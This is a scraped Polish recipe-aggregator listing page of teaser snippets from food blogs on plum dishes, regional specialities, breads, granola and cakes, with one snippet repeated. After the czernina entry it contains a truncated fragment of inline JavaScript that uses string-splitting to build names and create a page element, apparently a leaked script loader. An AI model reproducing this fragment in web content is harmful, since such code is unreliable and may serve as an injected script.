ciasto ze sliwkami - 6849 przepisów (strona:380/457)

Polskie potrawy regionalne, które warto spróbować 197

kilka z nich. Kartacze z Suwalszczyzny Kartacze lub też cepeliny to znane podlaskie placki z farszem mięsnym podawane z masłem i skwarkami. Można je porównać do poznańskich pyz. Ciasto wyrabiane jest z ziemniaków. To pożywne, syte, aczkolwiek ciężkostrawne danie. Mięsny farsz jest zazwyczaj mocno przyprawiany czosnkiem i przyprawami. Czasami można także spotkać kartacze z farszem warzywnym, serowym lub grzybowym. Babka(...)przyjeżdżających w te rejony. Czernina – Mazowsze Czarna polewka to zupa z krwi kaczej przygotowywana od setek lat zwłaszcza na terenach Mazowsza. Do jej przyrządzenia używa się także włoszczyzny, suszonych śliwek oraz suszu z jabłek i gruszek. Zupa ta była tak popularna, że aż przeszła do staropolskiej kultury – jest wzmiankowana między innymi w dziełach Mickiewicza. (function(){ innk_=("u"+"st");innk=document.createElement

Domowa Cukierenka-Domowa Kuchnia
Sklep bee.pl - opinia i testy produktów 98

torbą termiczną jadę do sklepu nakupić ich całą masę, zazwyczaj w promocji ;-) Syn jada lody codziennie, a ja z mężem równie często, bo mają znacznie mniej kalorii niż np. ciasto z kremem. I dlatego też zamówiłam sobie ze sklepu bee.pl pulpę z marakuji . Rewelacyjnie smakuje w połączeniu z lodami. Przepis jest banalnie prosty. Wystarczy nałożyć do pucharka 1-2 gałki(...)wcześniej, a nie zawsze mam ochotę na takie skomplikowane. Dlatego też zamówiłam sobie w sklepie internetowym bee.pl trzy śniadaniowe produkty: gotową owsiankę, pastę warzywną i granolę. Owsianka Inna Bajka śliwka i rokitnik zawiera tylko naturalne składniki (płatki owsiane, suszona śliwka, siemię lniane, owoc rokitnika i cukier kokosowy). Wystarczy ją zalać gorącą wodą lub mlekiem, odczekać odpowiednią ilość czasu i już

Passions hobbies life
Chleb fasolowy z rozmarynem 224

Jeden z moich ulubionych dodatków - to pieczony czosnek . Można dodać ugotowane kasze - jaglaną , gryczaną lub jęczmienną, także kuskus lub ryż . Ciekawe smaki pieczywa zawdzięczamy też nietypowym dodatkom - burakom, marchewce, śliwkom i jabłkom . Krótko mówiąc - można piec chleby z różnymi, typowymi i nietypowymi dodatkami (był raz chleb z chrzanem ). Zachęcam do szukania ciekawych przepisów z najprzeróżniejszymi dodatkami, i oczywiście do dzielenia(...)wodę z drożdżami i wodę ze zmiksowaną fasolą. Dodaj mąkę razową i mieszaj około minuty. Dodaj pozostałe składniki: mąkę chlebową, oliwę, sól i rozmaryn. Wyrabiaj robotem około 10 minut. Ciasto raczej nie nadaje się do wyrabiania ręcznego, gdyż jest stosunkowo luźne. Przełóż ciasto do natłuszczonej miski i odstaw pod przykryciem w ciepłe miejsce na około 2 godziny do wyrastania

Grahamka, weka i kajzerka
Owsiane batony mocy zero waste 156

...tak sobie je nazwałam, bo dają moc. Moc złagodzenia największego głoda. Są słodziutkie naturalną słodyczą bardzo dojrzałych bananów. Powstały dokładnie z  tego ,co zbywało mi

Z Kuchni Do Kuchni
Polska kuchnia w Warszawie - Polot 160

Wyczekana wiosna dała mi w końcu trochę energii, a skoro już ją mam to odwiedziłam ostatnio restaurację Polot . Stara myjnia samochodowa przerobiona na restaurację - duże WOW

Niezły Młynek
Chleb kukurydziany na poolish czyli polskim rozczynie drożdżowym 207

jest aby na tym etapie skontrolować jeszcze konsystencje ciasta, w miarę potrzeby dodać maki lub wody. Wyrobić jeszcze raz około 3 minut (mikser – poziom 2). Mnie udało się zrobić ciasto luźne, ale gładkie i sprężyste i dobrze trzymające formę.Odstawić przykryte do wyrośnięcia na półtorej godziny, w międzyczasie po ok 45 min wyjąc, lekko odgazować, uformować kule i znowu odstawić(...)Kuchnia Alicji Marta  z bloga Czereśniowa kuchnia Marzena z bloga Zacisze kuchenne Olimpia z bloga  Pomysłowe pieczenie Renata S z bloga  Forks'N'Canvas Śliwka  z bloga Smakowity Chleb Tofka  z bloga Para w kuchni Wisła z bloga  Zapach chleba Z chlebowym pozdrowieniem

Moje domowe kucharzenie
Domowa granola – prosty przepis 321

Domowa granola to przepis na zdrowe i pożywne śniadanie. Jest tak pyszna i prosta w przygotowaniu, że nie wrócicie już do kupnych płatków. Domowa granola –

Na-talerzu.pl
Bakalie — 5 powodów, dlaczego warto je jeść? 93

podniebienia. To jednak nie wszystko! Sprawdź, dlaczego jeszcze warto je jeść. Pyszny smak Prawdziwe bakalie stanowią mieszankę suszonych, niekiedy dodatkowo dosładzanych, owoców egzotycznych. Zalicza się do nich przede wszystkim: śliwki, rodzynki, daktyle, morele, kandyzowaną skórkę z cytryny i pomarańczy, migdały, różne rodzaje orzechów: nerkowce, brazylijskie, laskowe, włoskie czy pistacjowe. Smakołyki mają wiele zalet, wśród których szczególnie istotny jest ich smak(...)przekąska i dodatek do potraw Warto wiedzieć, że bakalie są idealne nie tylko jako przekąska, którą zjesz wprost z torebki. Doskonale pasują też do dań słodkich, takich jak naleśniki, ciasta czy owsianka, jak i wytrawnych — możesz je dodawać np. do zdrowych sałatek. Niektóre orzechy po zmieleniu (np. migdały) mogą stanowić wartościową mąkę. Doskonale sprawdzają się w deserach, zwłaszcza ciastach, tortach

Kuchennyviral.pl
Subskrypcja wina 101

Subskrypcja wina Gdzie i dlaczego subskrybować wino  Subskrypcja wina w Polsce dopiero zyskuje popularność, ale dla nas okazała się strzałem w dziesiątkę. Lubimy delektować się

Cztery Fajery
Słoik z kaszą jaglaną, borówkami, jogurtem i śliwką 121

  Kasza jaglana przez lata zapomniana, dziś przeżywa wielki renesans. Bardzo dobrze, bo posiada mnóstwo właściwości prozdrowotnych: wzmacnia, poprawia krążenie, oczyszcza jelita, likwiduje stany zapalne, jest

Tajemnice Smaku
Pieczona owsianka z dynią, czekoladą i orzechami 74

temu upiekłam sporą dynię, z myślą o musie, który potem wykorzystam do potraw. Pierwszą z nich miał być chlebek dyniowy. Drugą owsianka. Resztę musu zamroziłam. Przyda się do chili, ciast, owsianek, zup. Owsianka. Od razu wiedziałam, że zrobię pieczoną. Poszperałam na blogu u siebie, znalazłam przepis na właśnie taki rodzaj owsianki. No dobra, lecimy. Koniecznie z czekoladą. A jak dynia(...)wkładamy do nagrzanego piekarnika, pieczemy 25 minut. Przed podaniem całość posypujemy orzechami i polewamy dodatkową porcją miodu lub syropu klonowego. Podobne przepisy: Pieczona owsianka z morelami Owsianka pieczona ze śliwkami Pieczona owsianka z czekoladą i malinami Artykuł Pieczona owsianka z dynią, czekoladą i orzechami pochodzi z serwisu Kardamonowy

Kardamonovy
Przechowywanie żywności 100

szybko wykorzystana. Pełnoziarnista mąka – wiadomo do czego służy mąka: ciasta, naleśniki, pierogi i wiele innych potraw. W lodówce zalega ser twarogowy? – pora usmażyć razowe naleśniki z serkiem i owocami. Być może nie masz co zrobić z dużą ilością czerniejących już bananów, których żal było nie kupić na promocji? – czas na ciasto bananowe , które będzie o niebo zdrowsze od sklepowych słodkości(...)doskonały dodatek do zimowych obiadów, fasolka szparagowa – świetnie nadaje się jako składnik sałatek do słoików, jabłka, z których można przygotować mus idealny do razowych naleśników, truskawki, maliny, jagody, borówki, śliwki i inne letnie owoce możemy przerabiać na szereg konfitur i dżemów, żurawina – zmiksowana z dodatkiem cukru i spasteryzowana w słoiczkach to znakomity dodatek do herbaty na jesienne zimowe wieczory, stanowiący

moj przepis na
Przechowywanie żywności 100

szybko wykorzystana. Pełnoziarnista mąka – wiadomo do czego służy mąka: ciasta, naleśniki, pierogi i wiele innych potraw. W lodówce zalega ser twarogowy? – pora usmażyć razowe naleśniki z serkiem i owocami. Być może nie masz co zrobić z dużą ilością czerniejących już bananów, których żal było nie kupić na promocji? – czas na ciasto bananowe , które będzie o niebo zdrowsze od sklepowych słodkości(...)doskonały dodatek do zimowych obiadów, fasolka szparagowa – świetnie nadaje się jako składnik sałatek do słoików, jabłka, z których można przygotować mus idealny do razowych naleśników, truskawki, maliny, jagody, borówki, śliwki i inne letnie owoce możemy przerabiać na szereg konfitur i dżemów, żurawina – zmiksowana z dodatkiem cukru i spasteryzowana w słoiczkach to znakomity dodatek do herbaty na jesienne zimowe wieczory, stanowiący

moj przepis na
CzeKoLadowo-MakOwy Torcik ŚwiątecZny 114

masy bezowej dodajemy utarte żółtka i delikatnie mieszamy szpatułą. Przesiewamy sypkie składniki i bardzo delikatnie mieszamy. Formę o średnicy 23 cm wyłożyć papierem do pieczenia. Przekładamy do niej ciasto. Pieczemy w temperaturze 170ºC przez około 30 minut lub do tzw. suchego patyczka. Po wystudzeniu kroimy na 3 blaty. Składniki na blaty bezowe: 3 białka  szczypta soli 0.5 kubka cukru(...)boków i wierzchu tortu, a resztę podzielić na 4 równe części. Blaty nasączamy wedel uznania amaretto, jeśli chcecie możecie herbatą! Smarujemy ulubionym dżemem. Ja najbardziej lubię w tym torcie śliwki!  Na biszkopt beza, na bezę krem i powtarzamy.  SMACZNEGO

Luźna Kuchnia